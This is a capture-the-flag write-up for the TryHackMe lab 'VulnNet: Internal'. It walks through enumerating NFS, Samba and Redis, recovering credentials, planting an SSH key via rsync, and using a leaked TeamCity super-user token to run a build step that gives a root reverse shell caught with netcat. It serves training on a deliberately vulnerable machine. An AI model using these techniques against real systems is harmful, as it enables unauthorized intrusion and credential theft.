VulnNet: Internal
TryHackMe: VulNet: Internal by MindOverflow
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can't make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you're tasked to perform a penetration test of their network and report your findings.
Difficulty: Easy/Medium
Operating System: Linux
This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It's supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.
Note: It might take 3-5 minutes for all the services to boot.
Author: TheCyb3rW0lf
Discord: CyberWølf#8594
Icon made by Freepik from www.flaticon.com
Enumeration
Let's throw an entry into /etc/hosts and fire up rustscan
──╼ $rustscan -a vulnetint -- -sC -sV -A -oA vulnetint -vv
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.206.9:22
Open 10.10.206.9:111
Open 10.10.206.9:139
Open 10.10.206.9:445
Open 10.10.206.9:873
Open 10.10.206.9:2049
Open 10.10.206.9:6379
Open 10.10.206.9:41887
Open 10.10.206.9:43419
Open 10.10.206.9:46523
Open 10.10.206.9:59159
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 20:11 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating Ping Scan at 20:11
Scanning 10.10.206.9 [2 ports]
Completed Ping Scan at 20:11, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 20:11
Scanning vulnetint (10.10.206.9) [11 ports]
Discovered open port 445/tcp on 10.10.206.9
Discovered open port 139/tcp on 10.10.206.9
Discovered open port 111/tcp on 10.10.206.9
Discovered open port 22/tcp on 10.10.206.9
Discovered open port 46523/tcp on 10.10.206.9
Discovered open port 41887/tcp on 10.10.206.9
Discovered open port 6379/tcp on 10.10.206.9
Discovered open port 873/tcp on 10.10.206.9
Discovered open port 59159/tcp on 10.10.206.9
Discovered open port 2049/tcp on 10.10.206.9
Discovered open port 43419/tcp on 10.10.206.9
Completed Connect Scan at 20:11, 0.08s elapsed (11 total ports)
Initiating Service scan at 20:11
Scanning 11 services on vulnetint (10.10.206.9)
Completed Service scan at 20:11, 16.19s elapsed (11 services on 1 host)
NSE: Script scanning 10.10.206.9.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 2.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.18s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Nmap scan report for vulnetint (10.10.206.9)
Host is up, received conn-refused (0.040s latency).
Scanned at 2021-07-28 20:11:16 BST for 19s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
| 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 46523/tcp mountd
| 100005 1,2,3 51879/udp mountd
| 100005 1,2,3 52807/tcp6 mountd
| 100005 1,2,3 59253/udp6 mountd
| 100021 1,3,4 33920/udp6 nlockmgr
| 100021 1,3,4 41021/tcp6 nlockmgr
| 100021 1,3,4 41887/tcp nlockmgr
| 100021 1,3,4 44664/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
6379/tcp open redis syn-ack Redis key-value store
41887/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
43419/tcp open mountd syn-ack 1-3 (RPC #100005)
46523/tcp open mountd syn-ack 1-3 (RPC #100005)
59159/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNNET-INTERNA<00> Flags: <unique><active>
| VULNNET-INTERNA<03> Flags: <unique><active>
| VULNNET-INTERNA<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24150/tcp): CLEAN (Couldn't connect)
| Check 2 (port 44345/tcp): CLEAN (Couldn't connect)
| Check 3 (port 12822/udp): CLEAN (Failed to receive data)
| Check 4 (port 31018/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-07-28T21:11:33+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-28T19:11:33
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds
NFS
Looking at the above NFS is open so let's take a look
└──╼ $showmount -e vulnetint
Export list for vulnetint:
/opt/conf *
We have a conf directory exported so lets mount that and take a look.
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $mkdir conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $sudo mount vulnetint:/opt/conf conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $ls conf/
hp init opt profile.d redis vim wildmidi
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint/conf]
└──╼ $ls *
hp:
hplip.conf
init:
anacron.conf lightdm.conf whoopsie.conf
opt:
profile.d:
bash_completion.sh cedilla-portuguese.sh input-method-config.sh vte-2.91.sh
redis:
redis.conf
vim:
vimrc vimrc.tiny
wildmidi:
wildmidi.cfg
Looking through the files the following looks interesting in the redis.conf
slave-serve-stale-data yes
requirepass "[REDACTED]"
They might have reused that password so will bank it.
Samba
└──╼ $smbclient -N -L //vulnetint
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Let us take a look in shares
└──╼ $smbclient -N //vulnetint/shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 2 09:20:09 2021
.. D 0 Tue Feb 2 09:28:11 2021
temp D 0 Sat Feb 6 11:45:10 2021
data D 0 Tue Feb 2 09:27:33 2021
11309648 blocks of size 1024. 3276124 blocks ava
Here under temp we find our first flag
sh
smb: \> cd temp
smb: \temp\> ls
. D 0 Sat Feb 6 11:45:10 2021
.. D 0 Tue Feb 2 09:20:09 2021
services.txt N 38 Sat Feb 6 11:45:09 2021
11309648 blocks of size 1024. 3276124 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec
Moving on to data let's grab the files under there...
smb: \> cd data
smb: \data\> ls
. D 0 Tue Feb 2 09:27:33 2021
.. D 0 Tue Feb 2 09:20:09 2021
data.txt N 48 Tue Feb 2 09:21:18 2021
business-req.txt N 190 Tue Feb 2 09:27:33 2021
11309648 blocks of size 1024. 3276124 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (1.0 KiloBytes/sec) (average 0.6 Kilo
Let's take a look at these
└──╼ $cat data.txt
Purge regularly data that is not needed anymore
└──╼ $cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
Hmm a bit cryptic and not help as of yet..... what else was open....
redis
Using the password we found earlier we can use nc to connect to redis and query the server info
└──╼ $nc vulnetint 6379
auth [REDACTED]
+OK
info
$2755
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-135-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:538
run_id:2b688688620553ed8733a92036cdb5fb00ca868c
tcp_port:6379
uptime_in_seconds:2223
uptime_in_days:0
hz:10
lru_clock:110996
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:841488
used_memory_human:821.77K
used_memory_rss:2842624
used_memory_rss_human:2.71M
used_memory_peak:841488
used_memory_peak_human:821.77K
used_memory_peak_perc:100.00%
used_memory_overhead:832358
used_memory_startup:782432
used_memory_dataset:9130
used_memory_dataset_perc:15.46%
total_system_memory:2087923712
total_system_memory_human:1.94G
used_memory_lua:37888
used_memory_lua_human:37.00K
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
mem_fragmentation_ratio:3.38
mem_allocator:jemalloc-3.6.0
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627498725
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
# Stats
total_connections_received:6
total_commands_processed:9
instantaneous_ops_per_sec:0
total_net_input_bytes:190
total_net_output_bytes:525
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:8
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
connected_slaves:0
master_replid:7f9d24aef91081f5a01398919e0d1094ac00513b
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:1.55
used_cpu_user:0.92
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=5,expires=0,avg_ttl=0
After messing around with redis I ended up just dumping it to get the internal flag
└──╼ $redis-cli -h vulnetint -a [REDACTED] --rdb dump.rdb
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
sending REPLCONF capa eof
SYNC sent to master, writing 762 bytes to 'dump.rdb'
Transfer finished with success.
Transfer finished with success.
└──╼ $grep -a flag dump.rdb
internal flag%THM{[REDACTED]}
Inside here we also have a "authlist" key which we can query as below
vulnetint:6379> select 0
OK
vulnetint:6379> keys *
1) "1"
2) "internal flag"
3) "marketlist"
4) "authlist"
5) "int"
6) "tmp"
vulnetint:6379> lrange authlist 0 99
1) "[REDACTED]="
2) "[REDACTED]="
3) "[REDACTED]="
4) "[REDACTED]="
Running this throuogh base64 we get
└──╼ $echo [REDACTED]| base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password [REDACTED]
We can know use rysnc to grab files off the target
└──╼ $rsync -av rsync://rsync-connect@vulnetint/
from here we can grab user.txt
cat sys-internal/user.txt
Foothold
Ok, using the access via rsync lets send over our public key
└──╼ $cat ~/.ssh/id_rsa.pub > .ssh/authorized_keys
└──╼ $sudo chown 0600 .ssh/authorised_keys
└──╼ $rsync -av .ssh/* rsync://rsync-connect@vulnetint/files/sys-internal/.s
──╼ $ssh sys-internal@vulnetint
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
541 packages can be updated.
342 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
sys-internal@vulnnet-internal:~$
Boom!! we are on the box, unfortunatley we need a password for sudo so let's see if we can find another privesc route...
Let's copy linpeas.sh across and see what we find....
-rwsr-xr-x 1 root root 621K Feb 1 14:44 /usr/local/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
╔══════════╣ Unexpected in root
/TeamCity
TeamCity
There is a java app listening on 127.0.0.1:8111, to access this we will need to do some poprt forwarding
└──╼ $ssh -L 8111:127.0.0.1:8111 sys-internal@vulnetint
As no admin exists we can create a login using the auth token
sys-internal@vulnnet-internal:/TeamCity/logs$ grep "authentication token" /TeamCity/logs/* 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
Now we are logged in we need to find a way to exploit this..... So TeamCity looks like a build system, digging around I create new project and then add a build script to run a command line.
I then click Run in the top right which results in reverseshell as root
└──╼ $nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on vulnetint 34872
/bin/sh: 0: can't access tty; job control turned off
# # # # id
uid=0(root) gid=0(root) groups=0(root)
# cd
# ls
root.txt
# cat root.txt
THM{[REDACTED]}
Done!
Another room done, although this was an Easy ranked room it took me longer that I would have liked in part due to the fact that I do not know allot about redis....
